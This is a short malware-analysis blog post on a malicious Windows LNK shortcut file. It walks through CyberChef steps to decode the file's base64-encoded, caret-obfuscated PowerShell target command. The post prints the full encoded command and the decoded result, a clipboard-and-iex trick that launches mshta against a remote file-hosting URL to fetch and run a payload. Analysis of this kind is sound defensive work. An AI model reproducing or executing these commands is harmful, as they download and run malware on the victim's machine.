Analysis Malicious LNK Part 2

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
quality 7/10 · good
0 net
Tags
malware lnk
Analysis Malicious LNK Part 2 Skip to main content Analysis Malicious LNK Part 2 By Diyar Saadi | WIN32 July 15, 2025 In this article we will start the second part of analyzing a malicious LNK file and try to analyze the code in the simplest way. Sample Link : https://bazaar.abuse.ch/sample/c07eddc933da41c6569168e02938857fc3964b36b3a95bd5df897d5a4482c961/ Malicious LNK Screenshot: Malicious LNK Structures Analysis: 1- Target: is appear that contain a long powershell code that try to execute a malicious stripped powershell codes . Malicious Powershell code analysis ( Inside Target Section in LNK File look Image upper ) : 1- Malicious Powershell Code : %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQAXgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8ALwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4AdAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4AXgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgAXgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4AXgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4AXgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA= 2- Malware Developer try to execute a Encoded Malicious Powershell Code : %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E 3- Encoded Base64 Malicious Code : cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQAXgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8ALwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4AdAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4AXgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgAXgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4AXgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4AXgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA= Decoding Malicious Base64 Encoded Powershell Code : 1- Open CyberChef in your web browser . 2- Paste the Encoded Malicious base64 Powershell code . 3- From the Operations field select from base64 or double click on it . 4- Then From the Operations field select Remove Null Bytes . If we look the output after decoding it look like still in some symbolic way obfuscated to deobfuscate this symbolics obfuscation method . Decoding Symbolic Obfuscated Code : 1- Do not clear your recent operations for decoding Malicious Base64 Encoded Powershell Code . 2- Again in operations search for Find/Replace Operations . 3- From Find Paste this ( ^ ) and keep the replace empty . 4- You can also deobfuscate manually . Result : scb 'mshta https:[//]store6.gofile].io/]download/direct/b08ea796-2c0b-412f-bd88-7b1c65e36b9e/Verlegung[.mp4']; iex (gcb) Comments Post a Comment
← Back to stories